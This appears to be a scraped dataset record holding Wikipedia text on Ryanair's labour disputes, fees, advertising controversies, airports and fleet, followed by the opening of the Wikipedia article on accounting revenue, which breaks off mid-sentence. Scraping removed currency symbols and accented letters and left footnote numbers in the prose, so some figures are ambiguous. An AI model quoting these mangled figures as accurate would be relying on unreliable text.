Ryanair would refurbish the building for another 9 million. 162 Previously, since 2004, the head office had been on the property of Dublin Airport, in proximity to the Aer Lingus head office. 164 Darley Investments built the facility in 1992. Ryanair later purchased Darley and had a 30 year lease of the head office facility from the Department of Transport of Ireland. The company negotiated to pay no rent for 12 years, then 122,000 year until 2008, then 244,000 year for the remainder of the lease. 162 In the early years, when Ryanair had a total of 450 employees who each had shares in the company, there was an agreement that staff would not join a labour union on the basis that they would influence how the company was run. 165 The treatment of employees has changed considerably since then and new employees no longer get shares in the company. While Ryanair announced in December 2017 that it would recognise pilots' unions, the company still refuses to recognise or negotiate with any union for cabin crew. citation needed In 2011, a former Ryanair captain was awarded financial compensation by an employment tribunal in London after being fired for handing out a union form to a cabin crew member while on duty. 166 In 2012, the Ryanair Pilot Group (RPG) was formed, but to date when? has not been successful in its aim to represent the pilots flying for Ryanair as a collective bargaining unit. citation needed Thousands of flight cancellations on 15 September 2017 triggered pilots to mobilise, and on 15 December, in Italy, Ireland and Portugal, O Leary recognised unions for the first time, blaming their good timing; he anticipated an uptick in labour costs in 2018, not altering its model. 167 Ryanair discussed union recognition in response to threatened strikes over the Christmas period. 168 Ryanair faced criticism for allegedly forcing pilots to pay tens of thousands of Euros for training, then establishing limited companies in Ireland to have the pilots work for Ryanair through an agency, 23 as well as forcing ground staff in Spain to open bank accounts in Gibraltar in which to receive their wages. 169 In May 2014, Ryanair's office in Marseille was raided by French police investigating complaints that the company was failing to follow French employment law. Ryanair protested about the raid. 170 In May 2015, the Mayor of Copenhagen announced a boycott of Ryanair. This came in the wake of protests from Danish unions regarding employment conditions. 24 After a court trial confirmed the unions' right to strike, Ryanair moved its bases out of Denmark. 171 On 10 August 2018, pilots of Ryanair in Germany, Sweden, Ireland, Belgium and the Netherlands walked out for 24 hours, leaving 400 flights cancelled. 25 It is considered by whom? to be one of the biggest strikes over pay issues. citation needed On 26 September 2018, Ryanair was forced to cancel 150 flights scheduled for that day, accounting for roughly 6% of its total flights, due to strikes in Spain, Belgium, the Netherlands, Portugal, Italy, and Germany. The British Civil Aviation Authority (CAA) urged the company to compensate the 2,400 affected passengers under EU Regulation 261, but Ryanair stated that it would refuse to accept any claims for compensation. 172 In December 2018, the Civil Aviation Authority announced that it would be taking legal action against Ryanair over its refusal to compensate thousands of UK-based customers. 173 In April 2021, the High Court rejected Ryanair's claim that it was exempt from awarding compensation because the disruption was due to "extraordinary circumstances". The ruling was upheld by the Court of Appeal in February 2022, though Ryanair may still appeal to the Supreme Court. 174 Twenty per cent of Ryanair's revenue is generated from ancillary revenue; that is, income from sources other than ticket fares. In 2009, ancillary revenue was at 598 million, compared to total revenue of 2,942 million. 175 Ryanair has been described by the consumer magazine Holiday Which? as being the worst offender for charging for optional extras. 26 As part of the low-cost business model, the airline charges fees, which can be related to alternative services such as using airport check-in facilities instead of the online service fee and paying by credit card. It also charges for extra services like checked-in luggage, and it offers food and drinks for purchase as part of a buy on board programme. 176 In 2009, Ryanair abolished airport check-in and replaced it with a fast bag drop for those passengers checking in bags. 177 The option of checking in at the airport for 10 has been discontinued, and all passengers are required to check-in online and print their boarding pass. Passengers arriving at the airport without a pre-printed online check-in will have to pay 55 45 for their boarding pass to be re-issued, while customers unable to check-in luggage online are asked to pay a fee which varies depending on where they are travelling to at the airport (as of June 2012). Ryanair faced criticism over the ambiguous nature of these changes. 178 27 New Ryanair aircraft have been delivered with non-reclining seats, no seat-back pockets, safety cards stuck on the back of the seats, and life jackets stowed overhead rather than under the seat. This allows the airline to save on aircraft costs and enables faster cleaning and security checks during short turnaround times. 179 Ryanair reportedly wanted to order its aircraft without window shades, 179 but the new aircraft do have them, as it is required by the regulations of the Irish Aviation Authority. citation needed Other proposed measures to reduce frills further have included eliminating two toilets to add six more seats, 180 redesigning the aircraft to allow standing passengers travelling in "vertical seats", charging passengers for using the toilet, 181 charging extra for overweight passengers, 182 and asking passengers to carry their checked-in luggage to the aircraft. 183 While CEO Michael O'Leary initially claimed that charging passengers for toilets was "going to happen", he stated days later that it was "technically impossible and legally difficult" but made for interesting and very cheap PR". 31 Ryanair has been criticised for many aspects of its customer service. The Economist wrote that Ryanair's "cavalier treatment of passengers" had given Ryanair "a deserved reputation for nastiness" and that the airline "has become a byword for appalling customer service ... and jeering rudeness towards anyone or anything that gets in its way". 184 In January 2019, a survey conducted by Which? found that the airline was the UK's least-liked short-haul airline, for the sixth year running. 29 Ryanair responded by saying that passenger numbers had risen 80% in the previous six years and this was a more accurate reflection of the airline's popularity than an "unrepresentative survey of just 8,000 people". 185 In August 2019, Ryanair came bottom in an annual Which? survey rating the customer services of 100 popular UK brands. 186 In 2002, the High Court of Ireland in Dublin awarded Jane O'Keefe 67,500 damages and her costs after Ryanair reneged on a free travel prize she was awarded for being the airline's 1 millionth passenger. 187 188 The airline has come under heavy criticism for its poor treatment of disabled passengers. In 2002, it refused to provide wheelchairs for disabled passengers at London Stansted Airport, greatly angering disabled rights groups. 189 The airline argued that this provision was the responsibility of the airport authority, stating that wheelchairs were provided by 80 of the 84 Ryanair destination airports, 190 at that time. A court ruling in 2004 judged that the responsibility should be shared by the airline and the airport owners; 191 Ryanair responded by adding a surcharge of 0.50 to all its flight prices. 192 In July 2012, a 69 year-old woman, Frances Duff, who has a colostomy, was refused permission to bring her medical kit on board, despite having a letter from her doctor explaining the need for her to carry this with her, and was asked by Ryanair boarding staff to lift her shirt in front of fellow passengers, to prove that she had a colostomy bag. Duff had previously attempted to contact Ryanair on three occasions to inquire about its policy regarding travellers' colostomy bags, but each time no one answered the phone after half an hour. 193 On 4 April 2011, Ryanair began adding a surcharge of 2 to its flights to cover the costs arising from compliance with EC Regulation 261 2004, which requires it to pay for meals and accommodation for passengers on delayed and cancelled flights. 194 Ryanair did not offer customers the possibility of contacting it by email or webform, only through a premium rate phone line, by fax or by post; however, it does now have a web form contact option and a live chat. An early day motion in the British Parliament put forward in 2006 criticised Ryanair for this reason and called on the company to provide customers with a means to contact the company by email. 195 Ryanair offers a basic rate telephone number for post-booking enquiries in the United Kingdom, which chose to omit the exemption for passenger transport services when enacting Article 21 of Directive 2011 83 EU on Consumer Rights under Regulation 41 of the Consumer Contracts (Information, Cancellation and Additional Payments) Regulations 2013. 196 On 17 June 2014, Ryanair announced a new campaign to re-invent itself as a more family-friendly airline. Speaking at the company's 2014 AGM, chief executive Michael O'Leary said that the airline needed to "stop unnecessarily pissing people off". Ryanair said up to 20% of its 81 million customers were travelling as families, and it wanted to raise that figure. Kenny Jacobs, Ryanair's chief marketing officer, said: "Families are a big deal for us. It's a group of customers that we want to get closer to". 197 As another step, the company launched LiveChat on its website to improve the quality of service and experience provided by the company. 198 This change in their approach had an almost immediate positive effect on the company's finances. 199 Ryanair was subject to widespread criticism 200 201 202 203 204 after it announced that it would be cancelling between 40 and 50 flights per day (about 2% of total daily flights) during September and October 2017. Flights were cancelled with very little notice, sometimes only hours before departure. Ryanair said that the cancellations aimed "to improve its system-wide punctuality" 205 which had dropped significantly in the first two weeks of September, which the airline attributed to "ATC capacity delays and strikes, weather disruptions and the impact of increased holiday allocations to pilots and cabin crew". 205 In subsequent statements, Ryanair acknowledged that it had "messed up" holiday schedules for pilots, including a change to the calendar year for how vacations were calculated. 206 In late December, a survey rated Ryanair and Vueling equally the worst in the world for customer service among short-haul carriers in the Which? survey. Ryanair responded, t his survey of 9,000 Which? members is unrepresentative and worthless, during a year when Ryanair is the world’s largest international airline (129 m customers) and is also the world’s fastest-growing airline (up to 9 m customers in 2017). We have apologised for the deeply regretted flight cancellations and winter schedule changes, and the disruption they caused to less than 1% of our customers". 207 In June 2022, Ryanair faced severe anger and backlash for making South Africans take a general knowledge test in the Afrikaans language before allowing them to board UK-bound flights, as a means to verify that their passports were genuine. South Africa has 11 official languages, of which Afrikaans is the 3rd most spoken, with a prevalence of 12%. A majority of the population cannot understand Afrikaans, and some refuse to speak it on principle, regarding it as the language of oppression during the Apartheid era. 208 Michael O'Leary subsequently announced that the test was being dropped following outrage in South Africa. 209 210 In 2018, Ryanair became the first airline and the only non-coal-power plant to be among the 10 companies with the highest amount of CO2 emissions in the EU. That year, Ryanair had an emission equivalent of 9.9 megatonnes of CO2. Emissions had risen by 49% over five years. Environmentalists criticized the airline harshly and saw it as a sign of the lack of taxation of aviation. 211 In 2020, Ryanair was criticised for releasing misleading advertisements through their claim they were "Europe's… Lowest Emissions Airline", using figures from an airline efficiency rating dating back to 2011. 212 Ryanair's advertising and the antics of Michael O'Leary, such as deliberately courting controversy to generate free publicity for the airline, 213 have led to several complaints to the Advertising Standards Authority (ASA) and occasionally court action being taken against the airline. 214 32 215 216 An example of this was the live BBC News interview on 27 February 2009 when Michael O'Leary, observing that it was "a quiet news day", commented that Ryanair was considering charging passengers 1 to use the toilet on its flights. The story subsequently made headlines in the media for several days and drew attention to Ryanair's announcement that it was removing check-in desks from airports and replacing them with online check-in. Eight days later O'Leary eventually admitted that it was a publicity stunt saying "It is not likely to happen, but it makes for interesting and very cheap PR". 217 The concept of Ryanair charging for even this most essential of customer services was foreseen by the spoof news website "The Mardale Times" some five months previously, in its article "Ryanair announce new 'Pay-Per-Poo' service". 218 Ryanair often uses advertising to make direct comparisons and attack its competitors. One of its advertisements used a picture of the Manneken Pis, a famous Belgian statue of a urinating child, with the words: "Pissed off with Sabena's high fares? Low fares have arrived in Belgium. Sabena sued and the court ruled that the advertisements were misleading and offensive. Ryanair was ordered to discontinue the advertisements immediately or face fines. Ryanair was also obliged to publish an apology and publish the court decision on its website. Ryanair used the apologies for further advertising, primarily for further price comparisons. 214 Another provocative ad campaign headlined "Expensive BAstards compared Ryanair with British Airways. As with Sabena, British Airways disagreed with the accompanying price comparisons and brought legal action against Ryanair. However, in this case, the High Court sided with Ryanair and threw BA's case out, ordering BA to make a payment towards Ryanair's court costs. The judge ruled "The complaint amounts to this: that Ryanair exaggerated in suggesting BA is five times more expensive because BA is only three times more expensive. 219 In 2007, Ryanair used an advertisement for its new Belfast route which showed Sinn F in's Martin McGuinness (Northern Ireland deputy First Minister and a former senior commander of the IRA) standing alongside party president Gerry Adams with a speech bubble which said "Ryanair fares are so low even the British Army flew home". 220 221 222 Ulster Unionists reacted angrily to the advertisement, while the Advertising Standards Authority said it did not believe the ad would cause widespread offence. 223 An advertisement depicting a model dressed as a schoolgirl was accompanied by the words "Hottest back to school fares". Ryanair advertised two Scottish and one UK-wide newspaper. After receiving 13 complaints, the advertisement was widely reported by national newspapers. The Advertising Standards Authority (ASA) instructed the airline to withdraw the advertisement in the United Kingdom, saying that it "appeared to link teenage girls with sexually provocative behaviour and was irresponsible and likely to cause serious or widespread offence". Ryanair said that it would "not be withdrawing this ad" and would "not provide the ASA with any of the undertakings they seek", on the basis that it found it absurd that "a picture of a fully clothed model is now claimed to cause 'serious or widespread offence' when many of the UK's leading daily newspapers regularly run pictures of topless or partially dressed females without causing any serious or widespread offence". 224 In late 2020, the airline faced criticism over its "jab and go" advert. 225 Although it usually does not serve the primary airports of major European cities, Ryanair has been criticised for placing the names of famous cities on distant secondary airports that were not built for tourist traffic and lacked transit links to the main city. Examples include "Paris Beauvais" (85 km (53 mi) north-northwest of Paris), "Brussels South" (46 km (29 mi) to the south of Brussels), "Milan Bergamo" (45 km (28 mi) from Milan), "Frankfurt Hahn" (102 km (63 mi) from Frankfurt and actually closer to the cities of Koblenz and Mainz), "D sseldorf Weeze" (83 km (52 mi) from D sseldorf and closer to Arnhem or Essen), "Glasgow Prestwick" (55 km (34 mi) from Glasgow), "Stockholm Skavsta" (84 km (52 mi) from Stockholm) and "Barcelona Reus" (88 km (55 mi) from Barcelona). Frommers has dubbed Ryanair the "ultimate bait-and-switch airline" for this deceptive practice. 226 Ryanair was ordered by the ASA to stop claiming that its flights from London to Brussels were faster than the rail connection Eurostar, because the claim was misleading, due to the required travel times to the airports mentioned. Ryanair stood by its claims, noting that the flight time is shorter than the train trip and that travel time is also required to reach Eurostar's stations. 227 228 In April 2008, Ryanair faced a probe by the UK Office of Fair Trading, after a string of complaints about its adverts. It was found to have breached advertising rules seven times in two years. ASA's director general Christopher Graham commented that formal referrals to the OFT were rare, the last occurring in 2005. He added that the ASA "would prefer to work with advertisers within the self-regulatory system rather than call in a statutory body, but Ryanair's approach has left us with no option". Ryanair countered with the claim that the ASA had "demonstrated a repeated lack of independence, impartiality and fairness". 229 In July 2009, Ryanair took several steps to "increase the clarity and transparency of its website and other advertising" after reaching an agreement with the OFT. The airline's website now includes a statement that "fares don't include optional fees charges" and they now include a table of fees to make fare comparisons easier. 230 In July 2010, Ryanair once again found itself in controversy regarding alleged misleading advertising. Ryanair circulated advertisements in two newspapers offering 10 one-way fares to European destinations. Following a complaint from rival carrier EasyJet, the ASA ruled the offer was "likely to mislead". 231 Ryanair did not comment on the claim but did hit back at EasyJet, claiming it cared about details in this regard but did not itself publicise its on-time statistics. EasyJet denied this. citation needed In April 2011, Ryanair advertised a place in the sun destinations but the advert was banned when it was found that some of the destinations experienced sunshine for as little as three hours per day and temperatures between 0 and 14 C (32 and 57 F). 232 In 2016, Ryanair stated that websites such as Opodo and CheapOair and their partners engaged in screenscraping and false advertising, and attempted to prevent them from showing Ryanair data. 233 In February 2020 the Advertising Standards Authority told Ryanair to provide adequate evidence to support environmental claims after the ASA banned adverts that claimed Ryanair was the lowest emissions airline in Europe for being misleading. 234 Ryanair had claimed in the adverts that they had "the lowest carbon emissions of any major airline" and it was a "low CO2 emissions airline" based on Europe's top 27 airlines. 234 The ASA queried some figures and the definition of a "major airline" for the purposes of assessing . 234 Complainants said the adverts were misleading and could not be substantiated. 234 In response to the ASA Ryanair cited data from Eurocontrol and airline efficiency rankings from Brighter Plant. 234 However the ASA said that Ryanair had used an efficiency ranking from 2011 which was "of little value as substantiation for a comparison made in 2019". 234 The ASA said that customers would interpret the adverts as saying that flying with Ryanair would mean they contributed fewer CO2 emissions to the earth atmosphere, which could not be proven. 234 The ASA said that the adverts "ads must not appear again in their current forms" as claims in them could not be substantiated. 234 In February 2011, a Ryanair passenger, Miro Garcia, brought a claim against Ryanair for unfair surcharges, claiming that the 40 ( 30) surcharge on passengers who failed to print out a boarding card before arrival at the airport was unfair. Judge Barbara Cordoba, sitting in the Commercial Court in Barcelona, held that, under international air travel conventions, Ryanair can neither demand passengers turn up at the airport with their boarding pass, nor charge them 40 ( 30) if they do not, and that the fines were abusive because aviation law obliges airlines to issue boarding passes. Judge Cordoba stated: "I declare abusively and, therefore, null, the clause in the contract by which Ryanair obliges the passenger to take a boarding pass to the airport. ... the customary practice over the years has been that the obligation to provide the boarding pass has always fallen on the airline". The judge ordered a refund for Mr Garcia and said the fact the company was a low-cost carrier did "not allow it to alter its basic contractual obligations". 28 Ryanair appealed the decision and the Appeals Court in Spain overturned the ruling in November 2011, holding that the surcharge complies with international law. 235 In December 2011, Ryanair announced that it would fight against the UK Treasury's plan to ban what Which? magazine called "rip-off" charges made when customers paid by credit card. 236 EU legislation has already been drafted against surcharges for methods of payment. 237 On 26 July 2012, three Ryanair aircraft inbound to Madrid Barajas Airport diverted to Valencia Airport due to severe thunderstorms in the Madrid area. All three aircraft declared an emergency (Mayday) when the calculated usable fuel on landing at Valencia Airport was less than the final reserve (30 minutes of flight) after having been held in the air for 50 to 69 minutes. 238 The Irish Aviation Authority investigated the incidents and came to several conclusions, including: The Irish Aviation Authority made several recommendations, including that Ryanair should "review its fuel policy and consider issuing guidance to Crew concerning fuel when operating into busy airports with mixed aircraft operators and types, particularly in poor weather conditions when diversions are likely. 239 The IAA also recommended that the Spanish Aviation Safety and Security Agency "review delays into Madrid to consider if additional fuel should be recommended or required to be carried in normal operations, particularly where the southerly Runways are in operation. 239 Among the causes of the incident, the Civil Aviation Accident and Incident Investigation Commission concluded that "the company's fuel savings policy, though it complies with the minimum legal requirements, tends to minimise the amount of fuel with which its aircraft operate and leaves none for contingencies below the legal minimums. This contributed to the amount of fuel used being improperly planned and to the amount of fuel onboard dropping below the required final fuel reserve. 240 In an interview with the Dutch investigative journalism programme KRO Reporter, four anonymous Ryanair pilots claimed they were being pressured to carry as little fuel as possible on board to cut costs. 241 Ryanair and its CEO Michael O'Leary denied the allegations and sued KRO. 242 243 On 16 April 2014, the Dutch Court decided that KRO had provided sufficient evidence in two television episodes of Mayday, Mayday broadcast in 2012 and 2013 to back the claims in respect of Ryanair's fuel policy and "fear culture". It also found that Ryanair had been given a right to reply in response to the claims. The broadcast of the programmes was found to be in the public interest. Ryanair was ordered to pay the legal costs of the case. 244 Starting in late March 2020, in response to flight cancellations due to travel restrictions set by governments due to COVID 19, Ryanair was forced to cancel flights. This resulted in many of their staff being placed on furlough, with pay being cut by up to 50% for some employees placed on the Irish Temporary Wage Subsidy Scheme (TWSS). 245 The handling of refunds from Ryanair has caused a surge in complaints to the Commission for Aviation Regulation (CAR), with customers claiming that they have been refused a refund for the flight cancellation. 246 Many organisations have taken a stance against the aviation industry via actions or declarations in the press. 247 The Italian civil aviation authority ENAC has threatened a ban of Ryanair due to alleged violation of local COVID 19 regulations. 248 The Ryanair chief executive Michael O'Leary said its planes would not fly if the airline was required to leave its middle seats empty to comply with in-flight social distancing rules. 249 He said blocking the space between seats was "idiotic" and would have no beneficial effect. 250 Ryanair has several low-cost competitors. Although traditionally a full-service airline, Aer Lingus moved to a low-fares strategy from 2002, leading to a much more intense competition with Ryanair on Irish routes. 251 Ryanair is a member of Airlines for Europe, having formerly been a member of the defunct European Low Fares Airline Association. 252 253 Airlines that attempt to compete directly with Ryanair are treated competitively, with Ryanair being accused by some of reducing fares to significantly undercut its competitors. In response to MyTravelLite, which started to compete with Ryanair on Birmingham to Dublin route in 2003, Ryanair set up competing flights on some of MyTravelLite's routes until it pulled out. Go was another airline that attempted to offer services from Ryanair's base in Dublin to Glasgow and Edinburgh in Scotland. A fierce battle ensued, which ended with Go withdrawing its service from Dublin. 254 In September 2004, Ryanair's biggest competitor, EasyJet, announced routes to Ireland for the first time, beginning with the Cork to London Gatwick route. Until then, EasyJet had never competed directly with Ryanair on its home ground. EasyJet later withdrew its Gatwick-Cork, Gatwick-Shannon, Gatwick-Knock and Luton-Shannon routes. 255 In 2012, Ryanair also responded to the decision of another low-cost carrier, Wizz Air, that planned to move its flight operations from Warsaw Chopin Airport in Poland to the new low-cost Warsaw Modlin Airport in Nowy Dw r Mazowiecki. 256 Ryanair had previously operated the route to Dublin from Warsaw but withdrew, claiming that the fees at Warsaw's main airport were too high. When Wizz Air began operations from Modlin Airport, Ryanair began several new routes from the same airport, most of which were identical to routes offered by Wizz Air. In 2008, Ryanair asked the Irish High Court to investigate why it had been refused permission to fly from Knock to Dublin. This route was won by CityJet, which could not operate the service. The runner-up, Aer Arann, was then allowed to start flights, a move Ryanair criticises as the basis of not initiating an additional tender process was unlawful. 257 DFDS Seaways cited competition from low-cost air services, especially Ryanair, which now flies to Edinburgh Airport and London Stansted Airport from G teborg Landvetter Airport, as the reason for scrapping the Newcastle Gothenburg ferry service in October 2006. 258 It was the only dedicated passenger ferry service between Sweden and the United Kingdom and had been running under various operators since the 19th century. Ryanair's largest base is at London-Stansted, followed by its home base at Dublin Airport. 261 Ryanair operates bases across Europe, some parts of the Middle East, and North Africa. 262 Ryanair traditionally prefers to fly to smaller or secondary airports, such as London Stansted or Paris Beauvais, usually outside major cities to help the company benefit from lower landing fees and quick turn-around times to reduce costs. Ryanair has even referred to Bratislava Airport in Slovakia as "Bratislava Vienna", despite Vienna being 80 km (50 mi) away in another country. In some cases, secondary airports are not distant from the city they serve, and can be closer than the city's major airport; this is the case at Rome Ciampino Airport. Ryanair does still serve several major airports, including Amsterdam Schiphol, Stockholm Arlanda, Athens, Barcelona El Prat, Bucharest-Otopeni, Budapest, Copenhagen, Dublin, Lisbon, London-Gatwick, Madrid Barajas, Marseille, Oslo-Gardermoen and Rome-Fiumicino. Some of these cities do not have a viable secondary airport that Ryanair could use as an alternative. 226 More recently, Ryanair has grown more at primary airports as it looks to attract more business passengers. In the summer of 2014, the airline opened bases in Athens, Lisbon and the primary airports of Brussels and Rome for the first time. Ryanair flies in a point to-point model rather than the more traditional airline hub and spoke model where the passengers have to change aircraft in transit at a major airport, usually being able to reach more destinations this way. 263 264 In April 2017 Ryanair added connecting flights to its portfolio, starting with a new transfer hub in Rome Fiumicino Airport (FCO). 265 Despite it being an Irish airline, it also has a significant presence in France, Germany, Italy, Poland, Spain, the United Kingdom as well as many other European countries. Currently, its biggest country market is Italy, with fourteen bases and nine non-base airports. Ryanair's largest competitor is EasyJet which has a far greater focus on larger or primary airports such as Amsterdam and Paris-Charles de Gaulle, heavily targeting business passengers. Ryanair also serves sun and beach destinations with bases in Sicily, the Canary Islands, Cyprus, the Greek Islands, and Malta among others. In August 2014, the airline unveiled ambitious plans to establish a major hub in Israel to service a broad range of European routes. 266 In December 2014 Ryanair announced plans to open its 72nd base in 2015 in the Azores. 267 In February 2018, due to the Scottish Government not abolishing or reducing Air Passenger Duty (APD), Ryanair announced that it would cut many flights out of Glasgow Airport resulting in the airline closing its base there. The only routes out of Glasgow by the end of October were Dublin, Krak w and Wroclaw, with the rest being suspended permanently. This resulted in the loss of 300 members of airport staff. In April 2019, the airline reinstated four of its routes; to Alicante, Brussels, M laga and Warsaw. 268 In 2022, Ryanair announced that it would close its base at Frankfurt Airport in a row over fees, with the loss of 17 routes. The five aircraft based there are to be based in other locations throughout Europe. citation needed When Ryanair negotiates with airport operators, it demands very low landing and handling fees, as well as financial assistance with marketing and promotional campaigns. 270 In subsequent contract renewal negotiations, the airline has been reported to play airports against each other, threatening to withdraw services and deploy the aircraft elsewhere, if the airport does not make further concessions. According to Michael O'Leary's biography, A Life in Full Flight, Ryanair's growing popularity and also growing bargaining power, with both airports and aircraft manufacturers, has resulted in the airline being less concerned about a market research demographics approach to route selection to one based more on experimentation. This means it is more likely to fly its aircraft between the lowest-cost airports in anticipation that its presence alone on that route will be sufficient to create a demand which previously may not have existed, either in whole or in part. 271 In April 2006, a failure to reach an agreement on a new commercial contract resulted in Ryanair announcing that it would withdraw service on the Dublin Cardiff route at short notice. 272 The airport management rebutted Ryanair's assertion that airport charges were unreasonably high, claiming that the Cardiff charges were already below Ryanair's average and claimed that Ryanair had recently adopted the same negotiating approach with Cork Airport and London Stansted Airport. 273 In 2009, Ryanair was reported to have adopted "harsh" negotiating with Shannon Airport, threatening to close 75% of its operations there from April 2010. 274 Ryanair was forced to give up its Rome Ciampino Alghero route, after the route was allocated to Air One, as a public service obligation (PSO) route. The European Commission is investigating the actions of the Italian government in assigning PSO routes and thus restricting competition. citation needed In 2016, Ryanair withdrew over half of its flights from Rygge airport in Norway, after which the airport decided to close down totally, as it was privately owned and would make a loss on the low traffic volume. citation needed In order to further decrease airport costs and turnaround times, Ryanair flights often board and deplane from both the front and rear of the aircraft using boarding stairs or built-in airstairs rather than more expensive jet bridges. 275 In some cases, and more frequently as time has gone on, Ryanair has decided to use large airports where it is not dominant and pay the normal fees. Examples include Barcelona, Oslo, Copenhagen and Manchester, where the carrier increased flights in 2021. 276 As of July 2024, the Ryanair Group fleet consists of the following aircraft: 277 278 279 280 281 needs update Ryanair has operated the following types of aircraft in the past: Following the 2019 grounding of all 737 MAX aircraft, Ryanair initially reaffirmed its confidence in the aircraft and indicated that it would be ready to place a new order once it had returned to service; it would seek a reduced price instead of cash compensation. 294 In July that year, it warned that some of its bases would be subject to short-term closures in 2020, due to the shortfall in MAX deliveries, and pointed out that the MAX 200 version it has ordered will require separate certification expected to take a further two months after the MAX returns to service. 295 In the same month, O'Leary expressed concerns and frustration with the certification delays and revealed that, in parallel with discussions with Boeing regarding a potential order for new aircraft to be delivered from 2023, he was also talking to Airbus which was offering very aggressive pricing. 296 When Boeing builds an aircraft for Ryanair, it is allocated the customer code AS, which appears in its aircraft designation as an infix, such as 737 8AS. citation needed Ryanair's fleet reached 200 aircraft for the first time on 5 September 2009. 297 298 All aircraft in the Ryanair fleet have been retrofitted with performance-enhancing winglets and the more recent deliveries have them fitted as standard. 299 The company also owns four Learjet 45 business jets, based at London Stansted Airport and Bergamo Airport but registered in the Isle of Man, which are mainly used for the quick transportation of maintenance personnel and small aircraft parts around the network. 300 additional citation(s) needed On 13 March 2013, Ryanair signed an order for 175 new Boeing 737 800s. In the press conference announcing the order, Michael O'Leary said Ryanair was still evaluating the possibility of the Boeing 737 MAX and stated its huge order in March was for the Boeing 737 Next Generation rather than the 737 MAX as it needed aircraft before the 737 MAX would enter service. citation needed Ryanair also showed interest in other aircraft, including the Comac C919, when it signed a design agreement with Comac in 2011 to help produce a rival jet to Boeing's offerings. At the Paris Airshow in 2013, Michael O'Leary stated that Comac could build a larger version of the C919 aircraft that would hold up to 200 passengers. 301 On 30 April 2014, Ryanair confirmed that it had ordered five more aircraft to add to its fleet, four of them to be delivered in 2015 and the last one to be delivered in February 2016, to bring the number of aircraft on order to 180. 302 In the summer of 2014, Ryanair contracted AirExplore to operate some of their summer flights between London Stansted and Dublin airport. 303 On 8 September 2014, Ryanair committed to ordering 100 new Boeing 737 MAX 8s (plus options for an additional 100) for delivery in 2019. 100 On 1 December 2014, the airline finalised its order for up to 200 Boeing 737 MAX 200s, a version of the 737 MAX 8 for low-cost airlines, named after the fact that they can carry 200 passengers. The order includes 100 firm and 100 purchase rights. This makes Ryanair the launch customer of the Boeing 737 MAX 200. 304 After delays due to the grounding of the 737 MAX, the first Boeing 737 MAX 200 was finally delivered to Ryanair on 16 June 2021. Twelve deliveries were expected for the summer 2021 season (6 for Ryanair and 6 for Malta Air) and a further 50 by summer 2022. citation needed In July 2021, it was announced that Ryanair had already handed back all of its leased B737s, which were replaced by incoming B737 MAX 200 aircraft. The carrier expects to sell more of its older aircraft in the future. 305 In November 2022 the company announced it would have 124 Boeing 737 MAX 200 by summer 2023, reducing the number of unfulfilled orders to 86 aircraft. 306 In January 2023, the first Ryanair 737 800 to be retrofitted with split scimitar winglets entered service. The winglets reduce fuel burn by 1.5% and are to be fitted to all existing 800 aircraft in the Ryanair fleet. 307 On 30 January 2023, Ryanair Holdings CFO Neil Sorahan said that the Airbus A320 leases are extended to 2028. 282 On a 10 June 2023 flight from Bologna to Tel Aviv, a cabin crew member announced that the flight would soon be landing in Palestine. Many passengers were upset and the airline later apologised. 323 324 In June 2023, Ryanair fired chief pilot Aidan Murray for sexually harassing female colleagues. 325 |
587 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Revenue | In accounting, revenue is the total amount of income generated by the sale of goods and services related to the primary operations of the business. 1 Commercial revenue may also be referred to as sales or as turnover. Some companies receive revenue from interest, royalties, or other fees. 2 "Revenue" may refer to income in general, or it may refer to the amount, in a monetary unit, earned during a period of time, as in "Last year, company X had revenue of $42 million". Profits or net income generally imply total revenue minus total expenses in a given period. In accounting, revenue is a subsection of the equity section of the balance statement, since it increases equity. It is often referred to as the "top line" due to its position at the very top of the income statement. This is to be contrasted with the "bottom line" which denotes net income (gross revenues minus total expenses). 3 In general usage, revenue is the total amount of income by the sale of goods or services related to the company's operations. Sales revenue is income received from selling goods or services over a period of time. Tax revenue is income that a government receives from taxpayers. Fundraising revenue is income received by a charity from donors etc. to further its social purposes. In more formal usage, revenue is a calculation or estimation of periodic income based on a particular standard accounting practice or the rules established by a government or government agency. Two common accounting methods, cash basis accounting and accrual basis accounting, do not use the same process for measuring revenue. Corporations that offer shares for sale to the public are usually required by law to report revenue based on generally accepted accounting principles or on International Financial Reporting Standards. In a double-entry bookkeeping system, revenue accounts are general ledger accounts that are summarized periodically under the heading "revenue" or "revenues" on an income statement. Revenue account-names describe the type of revenue, such as "repair service revenue", "rent revenue earned" or "sales". 4 For non-profit organizations, revenue may be referred to as gross receipts, support, contributions, etc. 5 This operating revenue can include donations from individuals and corporations, support from government agencies, income from activities related to the organization's mission, income from fundraising activities, and membership dues. Revenue (income and gains) from investments may be categorized as "operating" or "non-operating"—but for many non-profits must (simultaneously) be categorized by fund (along with other accounts). For non-profits with substantial revenue from the dues of their voluntary members: non-dues revenue is revenue generated through means besides association membership fees. This revenue can be found through means of sponsorships, donations or outsourcing the association's digital media outlets. Business revenue is money income from activities that are ordinary for a particular corporation, company, partnership, or sole-proprietorship. For some businesses, such as manufacturing or grocery, most revenue is from the sale of goods. Service businesses such as law firms and barber shops receive most of their revenue from rendering services. Lending businesses such as car rentals and banks receive most of their revenue from fees and interest generated by lending assets to other organizations or individuals. Revenues from a business's primary activities are reported as sales, sales revenue or net sales. 2 This includes product returns and discounts for early payment of invoices. Most businesses also have revenue that is incidental to the business's primary activities, such as interest earned on deposits in a demand account. This is included in revenue but not included in net sales. 6 Sales revenue does not include sales tax collected by the business. Other revenue (a.k.a. non-operating revenue) is revenue from peripheral (non-core) operations. For example, a company that manufactures and sells automobiles would record the revenue from the sale of an automobile as "regular" revenue. If that same company also rented a portion of one of its buildings, it would record that revenue as "other revenue" and disclose it separately on its income statement to show that it is from something other than its core operations. The combination of all the revenue-generating systems of a business is called its revenue model. While the current IFRS conceptual framework 7 no longer draws a distinction between revenue and gains, it continues to be drawn at the standard and reporting levels. For example, IFRS 9.5.7.1 states: "A gain or loss on a financial asset or financial liability that is measured at fair value shall be recognised in profit or loss ... while the IASB defined IFRS XBRL taxonomy 8 includes OtherGainsLosses, GainsLossesOnNetMonetaryPosition and similar items. Revenue is a crucial part of financial statement analysis. The company's performance is measured to the extent to which its asset inflows (revenues) compare with its asset outflows (expenses). Net income is the result of this equation, but revenue typically enjoys equal attention during a standard earnings call. If a company displays solid "top-line growth", analysts could view the period's performance as positive even if earnings growth, or "bottom-line growth" is stagnant. Conversely, high net income growth would be tainted if a company failed to produce significant revenue growth. Consistent revenue growth, if accompanied by net income growth, contributes to the value of an enterprise and therefore the share price. Revenue is used as an indication of earnings 